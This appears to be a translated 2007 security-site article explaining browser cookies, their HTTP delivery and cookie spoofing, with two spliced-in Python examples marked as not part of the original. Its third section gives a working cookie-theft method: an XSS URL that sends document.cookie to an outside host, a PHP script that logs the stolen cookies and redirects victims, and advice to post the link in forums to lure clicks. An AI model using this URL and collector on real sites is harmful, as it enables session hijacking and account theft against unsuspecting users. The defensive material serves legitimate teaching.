Cookie delivery process and security issues - vulnerability warning - the black bar safety net

2007-03-16T00:00:00
ID MYHACK58:62200714573
Type myhack58
Reporter Anonymous (佚名)
Modified 2007-03-16T00:00:00

Description

"Cookie" in English means a small biscuit. How did a word we keep seeing in the browser come to be associated with food? When you return to a site you have logged in to before, it may greet you with "Hello XX", which feels as homely as eating a small treat. The site achieves this by reading a file it stored on your computer earlier, and that file is what we call a Cookie. Want to understand Cookies fully? Read on.

First, understanding the Cookie (suitable for beginner readers)

A Cookie is a small text file that a website stores on your machine when you visit it. It records your user ID, password, the pages you viewed, how long you stayed and similar information. When you return to the site, it reads the Cookie, learns who you are and can act accordingly, for example by showing a welcome message on the page or letting you log in directly without typing your ID and password again. In IE you can open "Tools/Internet Options", and on the "General" tab choose "Settings/View Files" to see every Cookie saved on your computer. These files are usually named in the form user@domain, where user is your local user name and domain is the domain name of the site you visited. If you use the Netscape browser, Cookies are stored under "C:\PROGRAMFILES\NETSCAPE\USERS\"; unlike IE, Netscape records the Cookies of all websites in a single Cookie file.

To keep your Internet use secure, the Cookie settings need attention. Open "Tools/Internet Options" and go to the "Privacy" tab (this tab exists only in IE 6.0; in other versions of IE, open "Tools/Internet Options", click the "Custom Level" button on the "Security" tab, and adjust the Cookie security level there). Usually, moving the slider to the "High" position is enough. Most forum sites need Cookie information to work; if you never visit such places, you can raise the level to "Block all Cookies". To block Cookies from individual sites only, click the "Edit" button and add those sites to the list. Under the "Advanced" button you can set first-party and third-party Cookies separately: a first-party Cookie is one sent by the site you are browsing, a third-party Cookie is one sent by a site other than the one you are browsing. Third-party Cookies are usually set to "Reject", as shown in Figure 1. If you need to save your Cookies, use IE's import/export feature: open "File/Import and Export" and follow the prompts.

Most Cookie contents are stored in encrypted form, so to us they look like meaningless combinations of letters and digits; only the CGI handler on the server knows their real meaning. With some software we can see more, for instance by viewing Cookie information with the Cookie Pal utility, as shown in Figure 2. It shows options such as Server, Expires, Name and Value: Server is the website that stored the Cookie, Expires records when the Cookie was set and how long it lives, and Name and Value hold the actual data. (This software was described in detail in an earlier issue of this publication.)

Second, the Cookie delivery process (suitable for intermediate readers)

When you type a website's URL into the browser's address bar, the browser sends that site a request for the page and shows the result on the screen. Taking Amazon as the example: before sending the request, the browser looks on your PC for a Cookie file set by the Amazon site, and if it finds one, it sends the data in that file along with the URL you entered to the Amazon server. When the server receives the Cookie data, it looks up your ID, purchase history, personal preferences and other information in its database, and writes any new content into both the database and the Cookie file. If no Cookie is found, or the Cookie information does not match the database, you are treated as a first-time visitor: the server's CGI program creates new ID information for you and saves it to the database.

Cookies are passed to the browser in the HTTP header of the page, and every page request, such as opening or refreshing a page, can carry Cookies with it. The server adds the Cookie to the page's HTTP header and returns it together with the page data, and the browser decides, according to the Cookie settings on your computer, whether to save that data. If the browser is not allowed to save Cookies, the data disappears when the browser is closed. How long a Cookie is kept on your computer varies and is decided by the server's settings: a Cookie has an Expires attribute that determines its storage time, and the server changes how long the Cookie is kept by setting the value of the Expires field. If this attribute is not set, the Cookie is valid only while you browse the page and disappears automatically when you close the browser; the vast majority of sites fall into this case. A Cookie typically contains the fields Server, Expires, Name and Value. Only Name and Value are useful to the server; Expires and the other fields merely tell the browser how to handle the Cookie.
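The browser-side handling just described, written out as an added Python example that is not code from the original article: a Set-Cookie header is split into the Name, Value, Expires and Domain fields, and a later request gets back only the cookies that belong to that host and have neither expired nor died with the browser session. The header strings and host names are constructed for the example.

```python
from dataclasses import dataclass
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
from typing import Optional


@dataclass
class Cookie:
    """The fields the article lists: Name, Value, Server (domain) and Expires."""
    name: str
    value: str
    domain: str
    expires: Optional[datetime]  # None = session cookie, gone when the browser closes

    def is_session_cookie(self) -> bool:
        return self.expires is None


def parse_set_cookie(header: str, request_host: str) -> Cookie:
    """Split 'name=value; Expires=...; Domain=...' into what the browser stores."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    domain, expires = request_host, None
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        if key.lower() == "expires":
            expires = parsedate_to_datetime(val)  # RFC 1123 date as used in Set-Cookie
        elif key.lower() == "domain":
            domain = val.lstrip(".")
    return Cookie(name, value, domain, expires)


def cookie_header_for(cookies, host: str, now: datetime, browser_restarted: bool) -> str:
    """Build the Cookie: header the browser attaches to a request to `host`."""
    send = []
    for c in cookies:
        if not (host == c.domain or host.endswith("." + c.domain)):
            continue  # set by another site: never sent to this host
        if c.is_session_cookie() and browser_restarted:
            continue  # no Expires: the cookie did not survive closing the browser
        if c.expires is not None and c.expires <= now:
            continue  # persistent cookie whose Expires date has passed
        send.append(f"{c.name}={c.value}")
    return "; ".join(send)


if __name__ == "__main__":  # constructed sample: one persistent and one session cookie
    p = parse_set_cookie("sid=abc123; Domain=.example.com; Expires=Sat, 16 Jun 2007 00:00:00 GMT", "www.example.com")
    s = parse_set_cookie("tmp=xyz", "www.example.com")
    now = datetime(2007, 3, 16, tzinfo=timezone.utc)
    print(cookie_header_for([p, s], "www.example.com", now, browser_restarted=False))
    print(cookie_header_for([p, s], "www.example.com", now, browser_restarted=True))
```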

Third, Cookie programming (suitable for advanced readers)

Most web programming languages provide Cookie support, for example JavaScript, VBScript, Delphi, ASP, SQL, PHP and C#. In these object-oriented languages, Cookie programming works in much the same way: first create a Cookie object, then use its control functions to assign, read and write Cookie values. So how can code obtain sensitive information from another user's Cookie? A brief introduction follows.

The method has two main steps. First, locate the website whose Cookies you want to collect, analyse it and construct a URL. Then write the PHP code that collects the Cookie and place it on a website you control; when an unsuspecting recipient clicks the constructed URL, the PHP code is executed. The concrete implementation is shown below.

  1. Analyze and construct the URL

First open the website whose Cookie we want to collect, assumed here to be http://www.XXX.net. Visit the site and enter the user name "<A1>" (without the quotation marks), then analyse the captured data to obtain a request of the form "http://www.XXX.net/txl/login/login.pl?username=<A1>&passwd=&ok.x=28&ok.y=6". Replace "<A1>" with "<script>alert(document.cookie)</script>" and try again; if that succeeds, construct the URL: "http://www.XXX.net/txl/login/login.pl?username=<script>window.open("http://www.cbifamily.org/cbi.php?"%2Bdocument.cookie)</script>&passwd=&ok.x=28&ok.y=6". Here http://www.cbifamily.org/cbi.php is a script on a host you control. Note that "%2B" is the URL encoding of the "+" symbol, because a bare "+" would be treated as a space. The URL is then posted in forums and others are persuaded to click it.

  2. Write the PHP script

The role of the script is to collect the Cookie data into a file, as follows:

    <?php
    // The cookie arrives appended to the query string by the URL above.
    $info = getenv("QUERY_STRING");
    if ($info) {
        $fp = fopen("info.txt", "a");   // append each visitor's data to info.txt
        fwrite($fp, $info . "\n");
        fclose($fp);
    }
    // Send the visitor on to the original site so nothing looks amiss.
    header("Location: http://www.XXX.net");
    ?>

Fourth, Cookie security issues (suitable for all readers who want secure Internet access)

  1. Cookie spoofing

The Cookie records information such as the user's account ID and password, and when it is transferred online it is typically encrypted with the MD5 method. Even if someone with bad intentions intercepts the encrypted information on the network, he cannot read it, because all he sees is meaningless letters and digits. The problem now is that the person who intercepts the Cookie does not need to know what these strings mean: he simply submits someone else's Cookie to the server, passes verification, and can log in to the site under the victim's identity. This is called Cookie spoofing. Two preconditions must hold: the server's authentication program must have a vulnerability, and the impostor must obtain the Cookie of the person being impersonated. It is very hard for a site's verification program to rule out all unauthorised access; for example, the language the verification program is written in may have gaps. Obtaining someone's Cookie, on the other hand, is very easy: a little code in any language that supports Cookies will do it (for the specific method, see the third section), and once that code is on the network, all the Cookies can be collected. If a forum allows HTML code or Flash tags, the Cookie-collecting code can be placed in the forum inside a post with an attractive subject and interesting content, and it will soon collect a large number of Cookies. Many people's forum passwords are stolen in this way. As for protection, there is no cure; we can only use the usual measures: do not use important passwords on forums, do not use IE's automatic password saving, and try not to log in to sites whose background you do not know.
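Added example, not part of the original article: the two server-side changes that break the theft chain of sections three and four, written in Python. The login page function, the cookie name "sid" and the host names are assumptions; the unescaped variant reproduces the flaw the article probes with the alert(document.cookie) string, while output escaping plus the HttpOnly and Secure flags close it.

```python
import html
from http.cookies import SimpleCookie


def login_page(username: str, escape_output: bool) -> str:
    """Echo the submitted user name back into the page, as the article's login.pl does.

    With escape_output=False this is the flaw the article exploits: a <script>
    tag inside the name becomes live code in the page and can read document.cookie.
    With escape_output=True the tag is rendered as text and never executes.
    """
    shown = html.escape(username, quote=True) if escape_output else username
    return f"<p>Hello {shown}, please enter your password.</p>"


def session_set_cookie(session_id: str, hardened: bool) -> str:
    """Build the Set-Cookie header for the (assumed) session cookie 'sid'.

    HttpOnly stops script in the page from reading the value via document.cookie,
    so even a successful injection cannot exfiltrate it; Secure keeps the cookie
    off plain HTTP, where the article notes it could be intercepted.
    """
    c = SimpleCookie()
    c["sid"] = session_id
    c["sid"]["path"] = "/"
    if hardened:
        c["sid"]["httponly"] = True
        c["sid"]["secure"] = True
    return c.output(header="").strip()


def contains_live_script_tag(page: str) -> bool:
    """True if a raw <script tag survived into the HTML (i.e. it would run)."""
    return "<script" in page.lower()


if __name__ == "__main__":
    probe = "<script>alert(document.cookie)</script>"  # the probe string from section three
    print(login_page(probe, escape_output=False))  # tag intact: vulnerable
    print(login_page(probe, escape_output=True))   # tag escaped: harmless text
    print(session_set_cookie("abc123", hardened=True))
```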

  2. Hidden Flash code

Flash has a getURL() function that lets a Flash movie open a specified web page automatically, so it can lead you to a website containing malicious code. For example, while you are enjoying an exquisite Flash animation on your own computer, code in one of its frames may silently connect to the Internet and open a small page containing special code. That page can collect your Cookies and do other things, such as planting a Trojan on your machine or even formatting your hard drive. Websites do not prohibit this behaviour, because it is internal to the Flash file. All we can do is keep the firewall on when browsing locally, and if the firewall prompts about an outgoing data packet you do not recognise, it is best to block it. When enjoying Flash online, it is best to stick to well-known large sites.